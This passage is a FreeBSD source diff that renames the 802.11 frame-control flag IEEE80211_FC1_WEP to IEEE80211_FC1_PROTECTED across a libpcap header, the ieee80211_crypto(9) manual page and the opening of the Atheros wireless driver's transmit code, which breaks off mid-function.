diff --git a/contrib/libpcap/ieee80211.h b/contrib/libpcap/ieee80211.h index d79f0f8e3656..894a9e761a96 100644 --- a/contrib/libpcap/ieee80211.h +++ b/contrib/libpcap/ieee80211.h @@ -1,146 +1,146 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2005 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * Alternatively, this software may be distributed under the terms of the * GNU General Public License ("GPL") version 2 as published by the Free * Software Foundation. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * $FreeBSD$ */ #ifndef _NET80211_IEEE80211_H_ #define _NET80211_IEEE80211_H_ /* * 802.11 protocol definitions. 
*/ #define IEEE80211_FC0_VERSION_MASK 0x03 #define IEEE80211_FC0_VERSION_SHIFT 0 #define IEEE80211_FC0_VERSION_0 0x00 #define IEEE80211_FC0_TYPE_MASK 0x0c #define IEEE80211_FC0_TYPE_SHIFT 2 #define IEEE80211_FC0_TYPE_MGT 0x00 #define IEEE80211_FC0_TYPE_CTL 0x04 #define IEEE80211_FC0_TYPE_DATA 0x08 #define IEEE80211_FC0_SUBTYPE_MASK 0xf0 #define IEEE80211_FC0_SUBTYPE_SHIFT 4 /* for TYPE_MGT */ #define IEEE80211_FC0_SUBTYPE_ASSOC_REQ 0x00 #define IEEE80211_FC0_SUBTYPE_ASSOC_RESP 0x10 #define IEEE80211_FC0_SUBTYPE_REASSOC_REQ 0x20 #define IEEE80211_FC0_SUBTYPE_REASSOC_RESP 0x30 #define IEEE80211_FC0_SUBTYPE_PROBE_REQ 0x40 #define IEEE80211_FC0_SUBTYPE_PROBE_RESP 0x50 #define IEEE80211_FC0_SUBTYPE_BEACON 0x80 #define IEEE80211_FC0_SUBTYPE_ATIM 0x90 #define IEEE80211_FC0_SUBTYPE_DISASSOC 0xa0 #define IEEE80211_FC0_SUBTYPE_AUTH 0xb0 #define IEEE80211_FC0_SUBTYPE_DEAUTH 0xc0 /* for TYPE_CTL */ #define IEEE80211_FC0_SUBTYPE_PS_POLL 0xa0 #define IEEE80211_FC0_SUBTYPE_RTS 0xb0 #define IEEE80211_FC0_SUBTYPE_CTS 0xc0 #define IEEE80211_FC0_SUBTYPE_ACK 0xd0 #define IEEE80211_FC0_SUBTYPE_CF_END 0xe0 #define IEEE80211_FC0_SUBTYPE_CF_END_ACK 0xf0 /* for TYPE_DATA (bit combination) */ #define IEEE80211_FC0_SUBTYPE_DATA 0x00 #define IEEE80211_FC0_SUBTYPE_CF_ACK 0x10 #define IEEE80211_FC0_SUBTYPE_CF_POLL 0x20 #define IEEE80211_FC0_SUBTYPE_CF_ACPL 0x30 #define IEEE80211_FC0_SUBTYPE_NODATA 0x40 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_ACK 0x50 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_POLL 0x60 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_ACPL 0x70 #define IEEE80211_FC0_SUBTYPE_QOS 0x80 #define IEEE80211_FC0_SUBTYPE_QOS_NULL 0xc0 #define IEEE80211_FC1_DIR_MASK 0x03 #define IEEE80211_FC1_DIR_NODS 0x00 /* STA->STA */ #define IEEE80211_FC1_DIR_TODS 0x01 /* STA->AP */ #define IEEE80211_FC1_DIR_FROMDS 0x02 /* AP ->STA */ #define IEEE80211_FC1_DIR_DSTODS 0x03 /* AP ->AP */ #define IEEE80211_FC1_MORE_FRAG 0x04 #define IEEE80211_FC1_RETRY 0x08 #define IEEE80211_FC1_PWR_MGT 0x10 #define IEEE80211_FC1_MORE_DATA 0x20 -#define IEEE80211_FC1_WEP 0x40 +#define IEEE80211_FC1_PROTECTED 0x40 #define IEEE80211_FC1_ORDER 0x80 #define IEEE80211_SEQ_FRAG_MASK 0x000f #define IEEE80211_SEQ_FRAG_SHIFT 0 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define IEEE80211_NWID_LEN 32 #define IEEE80211_QOS_TXOP 0x00ff /* bit 8 is reserved */ #define IEEE80211_QOS_ACKPOLICY 0x60 #define IEEE80211_QOS_ACKPOLICY_S 5 #define IEEE80211_QOS_ESOP 0x10 #define IEEE80211_QOS_ESOP_S 4 #define IEEE80211_QOS_TID 0x0f #define IEEE80211_MGT_SUBTYPE_NAMES { \ "assoc-req", "assoc-resp", \ "reassoc-req", "reassoc-resp", \ "probe-req", "probe-resp", \ "reserved#6", "reserved#7", \ "beacon", "atim", \ "disassoc", "auth", \ "deauth", "reserved#13", \ "reserved#14", "reserved#15" \ } #define IEEE80211_CTL_SUBTYPE_NAMES { \ "reserved#0", "reserved#1", \ "reserved#2", "reserved#3", \ "reserved#3", "reserved#5", \ "reserved#6", "reserved#7", \ "reserved#8", "reserved#9", \ "ps-poll", "rts", \ "cts", "ack", \ "cf-end", "cf-end-ack" \ } #define IEEE80211_DATA_SUBTYPE_NAMES { \ "data", "data-cf-ack", \ "data-cf-poll", "data-cf-ack-poll", \ "null", "cf-ack", \ "cf-poll", "cf-ack-poll", \ "qos-data", "qos-data-cf-ack", \ "qos-data-cf-poll", "qos-data-cf-ack-poll", \ "qos", "reserved#13", \ "qos-cf-poll", "qos-cf-ack-poll" \ } #define IEEE80211_TYPE_NAMES { "mgt", "ctl", "data", "reserved#4" } #endif /* _NET80211_IEEE80211_H_ */ diff --git a/share/man/man9/ieee80211_crypto.9 b/share/man/man9/ieee80211_crypto.9 index 9f48f21fd605..c82b87663197 100644 --- 
a/share/man/man9/ieee80211_crypto.9 +++ b/share/man/man9/ieee80211_crypto.9 @@ -1,260 +1,260 @@ .\" .\" Copyright (c) 2004 Bruce M. Simpson .\" Copyright (c) 2004 Darron Broad .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" 1. Redistributions of source code must retain the above copyright .\" notice, this list of conditions and the following disclaimer. .\" 2. Redistributions in binary form must reproduce the above copyright .\" notice, this list of conditions and the following disclaimer in the .\" documentation and/or other materials provided with the distribution. .\" .\" THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND .\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\" ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE .\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\" SUCH DAMAGE. .\" .\" $FreeBSD$ .\" $Id: ieee80211_crypto.9,v 1.3 2004/03/04 10:42:56 bruce Exp $ .\" .Dd March 29, 2010 .Dt IEEE80211_CRYPTO 9 .Os .Sh NAME .Nm ieee80211_crypto .Nd 802.11 cryptographic support .Sh SYNOPSIS .In net80211/ieee80211_var.h .\" .Pp .Ft void .Fn ieee80211_crypto_register "const struct ieee80211_cipher *" .\" .Ft void .Fn ieee80211_crypto_unregister "const struct ieee80211_cipher *" .\" .Ft int .Fn ieee80211_crypto_available "int cipher" .\" .Pp .Ft void .Fo ieee80211_notify_replay_failure .Fa "struct ieee80211vap *" .Fa "const struct ieee80211_frame *" .Fa "const struct ieee80211_key *" .Fa "uint64_t rsc" .Fa "int tid" .Fc .\" .Ft void .Fo ieee80211_notify_michael_failure .Fa "struct ieee80211vap *" .Fa "const struct ieee80211_frame *" .Fa "u_int keyix" .Fc .\" .Ft int .Fo ieee80211_crypto_newkey .Fa "struct ieee80211vap *" .Fa "int cipher" .Fa "int flags" .Fa "struct ieee80211_key *" .Fc .\" .Ft int .Fn ieee80211_crypto_setkey "struct ieee80211vap *" "struct ieee80211_key *" .\" .Ft int .Fn ieee80211_crypto_delkey "struct ieee80211vap *" "struct ieee80211_key *" .\" .Ft void .Fn ieee80211_key_update_begin "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_key_update_end "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_crypto_delglobalkeys "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_crypto_reload_keys "struct ieee80211com *" .\" .Pp .Ft struct ieee80211_key * .Fn ieee80211_crypto_encap "struct ieee80211_node *" "struct mbuf *" .\" .Ft struct ieee80211_key * .Fn ieee80211_crypto_decap "struct ieee80211_node *" "struct mbuf *" "int flags" .\" .Ft int .Fo ieee80211_crypto_demic .Fa "struct ieee80211vap *" .Fa "struct ieee80211_key *" .Fa "struct mbuf *" .Fa "int force" .Fc .\" .Ft int .Fo ieee80211_crypto_enmic .Fa "struct ieee80211vap *" .Fa "struct ieee80211_key *" .Fa "struct mbuf *" .Fa "int force" .Fc .Sh DESCRIPTION The .Nm net80211 layer includes comprehensive cryptographic support for 802.11 protocols. 
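Before the crypto discussion below, it may help to see how the frame-control masks defined in the ieee80211.h hunk above are typically consumed. The following is a minimal, self-contained sketch; the decode_fc() helper and the sample bytes are invented for illustration and are not part of net80211 or libpcap.

```c
/*
 * Minimal sketch: decode the 802.11 frame-control byte pair using the
 * masks from the ieee80211.h hunk above.  The helper and sample data
 * are local to this example.
 */
#include <stdint.h>
#include <stdio.h>

#define IEEE80211_FC0_TYPE_MASK		0x0c
#define IEEE80211_FC0_TYPE_MGT		0x00
#define IEEE80211_FC0_TYPE_CTL		0x04
#define IEEE80211_FC0_TYPE_DATA		0x08
#define IEEE80211_FC0_SUBTYPE_MASK	0xf0
#define IEEE80211_FC0_SUBTYPE_SHIFT	4
#define IEEE80211_FC1_PROTECTED		0x40	/* was IEEE80211_FC1_WEP */

static void
decode_fc(const uint8_t fc[2])
{
	uint8_t type = fc[0] & IEEE80211_FC0_TYPE_MASK;
	uint8_t subtype = (fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >>
	    IEEE80211_FC0_SUBTYPE_SHIFT;

	printf("type=%s subtype=%u protected=%s\n",
	    type == IEEE80211_FC0_TYPE_MGT ? "mgt" :
	    type == IEEE80211_FC0_TYPE_CTL ? "ctl" :
	    type == IEEE80211_FC0_TYPE_DATA ? "data" : "reserved",
	    subtype,
	    (fc[1] & IEEE80211_FC1_PROTECTED) ? "yes" : "no");
}

int
main(void)
{
	uint8_t qos_data_protected[2] = { 0x88, 0x40 };	/* QoS data, Protected */

	decode_fc(qos_data_protected);
	return (0);
}
```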
Software implementations of ciphers required by WPA and 802.11i are provided as well as encap/decap processing of 802.11 frames. Software ciphers are written as kernel modules and register with the core crypto support. The cryptographic framework supports hardware acceleration of ciphers by drivers with automatic fall-back to software implementations when a driver is unable to provide necessary hardware services. .Sh CRYPTO CIPHER MODULES .Nm net80211 cipher modules register their services using .Fn ieee80211_crypto_register and supply a template that describes their operation. This .Vt ieee80211_cipher structure defines protocol-related state such as the number of bytes of space in the 802.11 header to reserve/remove during encap/decap and entry points for setting up keys and doing cryptographic operations. .Pp Cipher modules can associate private state to each key through the .Vt wk_private structure member. If state is setup by the module it will be called before a key is destroyed so it can reclaim resources. .Pp Crypto modules can notify the system of two events. When a packet replay event is recognized .Fn ieee80211_notify_replay_failure can be used to signal the event. When a .Dv TKIP Michael failure is detected .Fn ieee80211_notify_michael_failure can be invoked. Drivers may also use these routines to signal events detected by the hardware. .Sh CRYPTO KEY MANAGEMENT The .Nm net80211 layer implements a per-vap 4-element .Dq global key table and a per-station .Dq unicast key for protocols such as WPA, 802.1x, and 802.11i. The global key table is designed to support legacy WEP operation and Multicast/Group keys, though some applications also use it to implement WPA in station mode. Keys in the global table are identified by a key index in the range 0-3. Per-station keys are identified by the MAC address of the station and are typically used for unicast PTK bindings. .Pp .Nm net80211 provides .Xr ioctl 2 operations for managing both global and per-station keys. Drivers typically do not participate in software key management; they are involved only when providing hardware acceleration of cryptographic operations. .Pp .Fn ieee80211_crypto_newkey is used to allocate a new .Nm net80211 key or reconfigure an existing key. The cipher must be specified along with any fixed key index. The .Nm net80211 layer will handle allocating cipher and driver resources to support the key. .Pp Once a key is allocated it's contents can be set using .Fn ieee80211_crypto_setkey and deleted with .Fn ieee80211_crypto_delkey (with any cipher and driver resources reclaimed). .Pp .Fn ieee80211_crypto_delglobalkeys is used to reclaim all keys in the global key table for a vap; it typically is used only within the .Nm net80211 layer. .Pp .Fn ieee80211_crypto_reload_keys handles hardware key state reloading from software key state, such as required after a suspend/resume cycle. .Sh DRIVER CRYPTO SUPPORT Drivers identify ciphers they have hardware support for through the .Vt ic_cryptocaps field of the .Vt ieee80211com structure. If hardware support is available then a driver should also fill in the .Dv iv_key_alloc , .Dv iv_key_set , and .Dv iv_key_delete methods of each .Vt ieee80211vap created for use with the device. In addition the methods .Dv iv_key_update_begin and .Dv iv_key_update_end can be setup to handle synchronization requirements for updating hardware key state. .Pp When .Nm net80211 allocates a software key and the driver can accelerate the cipher operations the .Dv iv_key_alloc method will be invoked. 
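As a rough model of the key layout described above (a per-vap four-slot global table indexed 0-3 plus an optional per-station unicast key), here is a self-contained sketch. Every type and name in it (ex_vap, ex_sta, ex_select_txkey, and so on) is hypothetical and only mirrors the structure of the text, not the real net80211 data structures.

```c
/*
 * Sketch of the key selection model described above: a 4-entry
 * per-vap "global" table (key indices 0-3, WEP/group keys) plus an
 * optional per-station unicast key.  All types here are invented for
 * illustration.
 */
#include <stdint.h>
#include <stddef.h>

#define EX_WEP_NKID	4		/* global key slots 0..3 */
#define EX_KEYIX_NONE	0xff

struct ex_key {
	uint8_t		keyix;		/* slot, or EX_KEYIX_NONE */
	uint8_t		keylen;
	uint8_t		key[32];
};

struct ex_vap {
	struct ex_key	global[EX_WEP_NKID];	/* group/WEP keys */
	uint8_t		def_txkey;		/* default tx key index */
};

struct ex_sta {
	struct ex_key	ucastkey;		/* pairwise key, if plumbed */
};

/* Pick the key used to protect a unicast transmit to 'sta'. */
const struct ex_key *
ex_select_txkey(const struct ex_vap *vap, const struct ex_sta *sta)
{
	if (sta != NULL && sta->ucastkey.keyix != EX_KEYIX_NONE)
		return (&sta->ucastkey);		/* pairwise (PTK) key */
	if (vap->def_txkey < EX_WEP_NKID)
		return (&vap->global[vap->def_txkey]);	/* group/WEP key */
	return (NULL);					/* no usable key */
}
```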
Drivers may return a token that is associated with outbound traffic (for use in encrypting frames). Otherwise, e.g. if hardware resources are not available, the driver will not return a token and .Nm net80211 will arrange to do the work in software and pass frames to the driver that are already prepared for transmission. .Pp For receive, drivers mark frames with the .Dv M_WEP mbuf flag to indicate the hardware has decrypted the payload. If frames have the -.Dv IEEE80211_FC1_WEP +.Dv IEEE80211_FC1_PROTECTED bit marked in their 802.11 header and are not tagged with .Dv M_WEP then decryption is done in software. For more complicated scenarios the software key state is consulted; e.g. to decide if Michael verification needs to be done in software after the hardware has handled TKIP decryption. .Pp Drivers that manage complicated key data structures, e.g. faulting software keys into a hardware key cache, can safely manipulate software key state by bracketing their work with calls to .Fn ieee80211_key_update_begin and .Fn ieee80211_key_update_end . These calls also synchronize hardware key state update when receive traffic is active. .Sh SEE ALSO .Xr ieee80211 9 , .Xr ioctl 2 , .Xr wlan_ccmp 4 , .Xr wlan_tkip 4 , .Xr wlan_wep 4 diff --git a/sys/dev/ath/if_ath_tx.c b/sys/dev/ath/if_ath_tx.c index b529db6dfddc..4492552626ec 100644 --- a/sys/dev/ath/if_ath_tx.c +++ b/sys/dev/ath/if_ath_tx.c @@ -1,6063 +1,6063 @@ /*- * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * Copyright (c) 2010-2012 Adrian Chadd, Xenion Pty Ltd * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * Driver for the Atheros Wireless LAN controller. * * This software is derived from work of Atsushi Onoe; his contribution * is greatly appreciated. 
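The receive-path rule in the manual page above (software decryption is needed when a frame carries the Protected bit but was not tagged by the driver as hardware-decrypted) reduces to a small predicate. The sketch below uses a stand-in flag for M_WEP and a hypothetical helper name.

```c
/*
 * Sketch of the receive-path decision described in the manual page
 * above: if a frame carries the Protected bit but the driver did not
 * tag it as already decrypted by hardware (M_WEP in FreeBSD), the
 * payload must be handed to the software cipher.  The flag value and
 * helper are illustrative stand-ins, not the real mbuf/net80211 API.
 */
#include <stdbool.h>
#include <stdint.h>

#define IEEE80211_FC1_PROTECTED	0x40
#define EX_M_HW_DECRYPTED	0x0001	/* stand-in for the M_WEP mbuf flag */

bool
ex_needs_software_decrypt(uint8_t fc1, uint32_t pkt_flags)
{
	if ((fc1 & IEEE80211_FC1_PROTECTED) == 0)
		return (false);			/* frame is in the clear */
	if (pkt_flags & EX_M_HW_DECRYPTED)
		return (false);			/* hardware already did it */
	return (true);				/* fall back to the s/w cipher */
}
```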
*/ #include "opt_inet.h" #include "opt_ath.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #include #ifdef INET #include #include #endif #include #include /* XXX for softled */ #include #include #ifdef ATH_TX99_DIAG #include #endif #include #include #include #ifdef ATH_DEBUG_ALQ #include #endif /* * How many retries to perform in software */ #define SWMAX_RETRIES 10 /* * What queue to throw the non-QoS TID traffic into */ #define ATH_NONQOS_TID_AC WME_AC_VO #if 0 static int ath_tx_node_is_asleep(struct ath_softc *sc, struct ath_node *an); #endif static int ath_tx_ampdu_pending(struct ath_softc *sc, struct ath_node *an, int tid); static int ath_tx_ampdu_running(struct ath_softc *sc, struct ath_node *an, int tid); static ieee80211_seq ath_tx_tid_seqno_assign(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0); static int ath_tx_action_frame_override_queue(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int *tid); static struct ath_buf * ath_tx_retry_clone(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf); #ifdef ATH_DEBUG_ALQ void ath_tx_alq_post(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf; int i, n; const char *ds; /* XXX we should skip out early if debugging isn't enabled! */ bf = bf_first; while (bf != NULL) { /* XXX should ensure bf_nseg > 0! */ if (bf->bf_nseg == 0) break; n = ((bf->bf_nseg - 1) / sc->sc_tx_nmaps) + 1; for (i = 0, ds = (const char *) bf->bf_desc; i < n; i++, ds += sc->sc_tx_desclen) { if_ath_alq_post(&sc->sc_alq, ATH_ALQ_EDMA_TXDESC, sc->sc_tx_desclen, ds); } bf = bf->bf_next; } } #endif /* ATH_DEBUG_ALQ */ /* * Whether to use the 11n rate scenario functions or not */ static inline int ath_tx_is_11n(struct ath_softc *sc) { return ((sc->sc_ah->ah_magic == 0x20065416) || (sc->sc_ah->ah_magic == 0x19741014)); } /* * Obtain the current TID from the given frame. * * Non-QoS frames need to go into TID 16 (IEEE80211_NONQOS_TID.) * This has implications for which AC/priority the packet is placed * in. */ static int ath_tx_gettid(struct ath_softc *sc, const struct mbuf *m0) { const struct ieee80211_frame *wh; int pri = M_WME_GETAC(m0); wh = mtod(m0, const struct ieee80211_frame *); if (! IEEE80211_QOS_HAS_SEQ(wh)) return IEEE80211_NONQOS_TID; else return WME_AC_TO_TID(pri); } static void ath_tx_set_retry(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* Only update/resync if needed */ if (bf->bf_state.bfs_isretried == 0) { wh->i_fc[1] |= IEEE80211_FC1_RETRY; bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); } bf->bf_state.bfs_isretried = 1; bf->bf_state.bfs_retries ++; } /* * Determine what the correct AC queue for the given frame * should be. * * This code assumes that the TIDs map consistently to * the underlying hardware (or software) ath_txq. * Since the sender may try to set an AC which is * arbitrary, non-QoS TIDs may end up being put on * completely different ACs. There's no way to put a * TID into multiple ath_txq's for scheduling, so * for now we override the AC/TXQ selection and set * non-QOS TID frames into the BE queue. 
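For reference, the TID/AC relationship used by ath_tx_gettid()/ath_tx_getac() above can be sketched as follows; the grouping of QoS TIDs into access categories follows the usual 802.11e convention, and the non-QoS TID is routed to the voice queue as the ATH_NONQOS_TID_AC definition above does. Constants and the helper are local to the example.

```c
/*
 * Sketch of the TID-to-AC mapping discussed above.  Non-QoS frames
 * use the out-of-band TID 16; QoS TIDs group into the four WME access
 * categories following the usual 802.11e assignment.
 */
#define EX_NONQOS_TID	16	/* IEEE80211_NONQOS_TID in net80211 */

enum ex_wme_ac { EX_AC_BE, EX_AC_BK, EX_AC_VI, EX_AC_VO };

int
ex_tid_to_ac(int tid)
{
	if (tid == EX_NONQOS_TID)
		return (EX_AC_VO);	/* ath above uses ATH_NONQOS_TID_AC (VO) */
	if (tid == 1 || tid == 2)
		return (EX_AC_BK);	/* background */
	if (tid == 4 || tid == 5)
		return (EX_AC_VI);	/* video */
	if (tid == 6 || tid == 7)
		return (EX_AC_VO);	/* voice */
	return (EX_AC_BE);		/* TIDs 0 and 3: best effort */
}
```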
* * This may be completely incorrect - specifically, * some management frames may end up out of order * compared to the QoS traffic they're controlling. * I'll look into this later. */ static int ath_tx_getac(struct ath_softc *sc, const struct mbuf *m0) { const struct ieee80211_frame *wh; int pri = M_WME_GETAC(m0); wh = mtod(m0, const struct ieee80211_frame *); if (IEEE80211_QOS_HAS_SEQ(wh)) return pri; return ATH_NONQOS_TID_AC; } void ath_txfrag_cleanup(struct ath_softc *sc, ath_bufhead *frags, struct ieee80211_node *ni) { struct ath_buf *bf, *next; ATH_TXBUF_LOCK_ASSERT(sc); TAILQ_FOREACH_SAFE(bf, frags, bf_list, next) { /* NB: bf assumed clean */ TAILQ_REMOVE(frags, bf, bf_list); ath_returnbuf_head(sc, bf); ieee80211_node_decref(ni); } } /* * Setup xmit of a fragmented frame. Allocate a buffer * for each frag and bump the node reference count to * reflect the held reference to be setup by ath_tx_start. */ int ath_txfrag_setup(struct ath_softc *sc, ath_bufhead *frags, struct mbuf *m0, struct ieee80211_node *ni) { struct mbuf *m; struct ath_buf *bf; ATH_TXBUF_LOCK(sc); for (m = m0->m_nextpkt; m != NULL; m = m->m_nextpkt) { /* XXX non-management? */ bf = _ath_getbuf_locked(sc, ATH_BUFTYPE_NORMAL); if (bf == NULL) { /* out of buffers, cleanup */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: no buffer?\n", __func__); ath_txfrag_cleanup(sc, frags, ni); break; } ieee80211_node_incref(ni); TAILQ_INSERT_TAIL(frags, bf, bf_list); } ATH_TXBUF_UNLOCK(sc); return !TAILQ_EMPTY(frags); } /* * Reclaim mbuf resources. For fragmented frames we * need to claim each frag chained with m_nextpkt. */ void ath_freetx(struct mbuf *m) { struct mbuf *next; do { next = m->m_nextpkt; m->m_nextpkt = NULL; m_freem(m); } while ((m = next) != NULL); } static int ath_tx_dmasetup(struct ath_softc *sc, struct ath_buf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = ATH_MAX_SCATTER + 1; } else if (error != 0) { sc->sc_stats.ast_tx_busdma++; ath_freetx(m0); return error; } /* * Discard null packets and check for packets that * require too many TX descriptors. We try to convert * the latter to a cluster. */ if (bf->bf_nseg > ATH_MAX_SCATTER) { /* too many desc's, linearize */ sc->sc_stats.ast_tx_linear++; m = m_collapse(m0, M_NOWAIT, ATH_MAX_SCATTER); if (m == NULL) { ath_freetx(m0); sc->sc_stats.ast_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->sc_stats.ast_tx_busdma++; ath_freetx(m0); return error; } KASSERT(bf->bf_nseg <= ATH_MAX_SCATTER, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->sc_stats.ast_tx_nodata++; ath_freetx(m0); return EIO; } DPRINTF(sc, ATH_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } /* * Chain together segments+descriptors for a frame - 11n or otherwise. * * For aggregates, this is called on each frame in the aggregate. 
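The packing rule ath_tx_chaindesclist() implements (up to sc_tx_nmaps buffer pointers per descriptor, four on EDMA chips and one on older parts) gives the descriptor-count formula also used by ath_tx_alq_post() above. A tiny standalone illustration:

```c
/*
 * Sketch of the segment-to-descriptor arithmetic used above: each
 * descriptor holds up to 'nmaps' buffer pointers, so a frame of
 * 'nseg' DMA segments consumes ((nseg - 1) / nmaps) + 1 descriptors.
 */
#include <stdio.h>

int
ex_descriptors_needed(int nseg, int nmaps)
{
	return (((nseg - 1) / nmaps) + 1);
}

int
main(void)
{
	/* 6 segments on a 4-pointer (EDMA-style) descriptor: 2 descriptors. */
	printf("6 segs, 4 maps -> %d descriptors\n",
	    ex_descriptors_needed(6, 4));
	/* 6 segments on a legacy 1-pointer descriptor: 6 descriptors. */
	printf("6 segs, 1 map  -> %d descriptors\n",
	    ex_descriptors_needed(6, 1));
	return (0);
}
```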
*/ static void ath_tx_chaindesclist(struct ath_softc *sc, struct ath_desc *ds0, struct ath_buf *bf, int is_aggr, int is_first_subframe, int is_last_subframe) { struct ath_hal *ah = sc->sc_ah; char *ds; int i, bp, dsp; HAL_DMA_ADDR bufAddrList[4]; uint32_t segLenList[4]; int numTxMaps = 1; int isFirstDesc = 1; /* * XXX There's txdma and txdma_mgmt; the descriptor * sizes must match. */ struct ath_descdma *dd = &sc->sc_txdma; /* * Fillin the remainder of the descriptor info. */ /* * We need the number of TX data pointers in each descriptor. * EDMA and later chips support 4 TX buffers per descriptor; * previous chips just support one. */ numTxMaps = sc->sc_tx_nmaps; /* * For EDMA and later chips ensure the TX map is fully populated * before advancing to the next descriptor. */ ds = (char *) bf->bf_desc; bp = dsp = 0; bzero(bufAddrList, sizeof(bufAddrList)); bzero(segLenList, sizeof(segLenList)); for (i = 0; i < bf->bf_nseg; i++) { bufAddrList[bp] = bf->bf_segs[i].ds_addr; segLenList[bp] = bf->bf_segs[i].ds_len; bp++; /* * Go to the next segment if this isn't the last segment * and there's space in the current TX map. */ if ((i 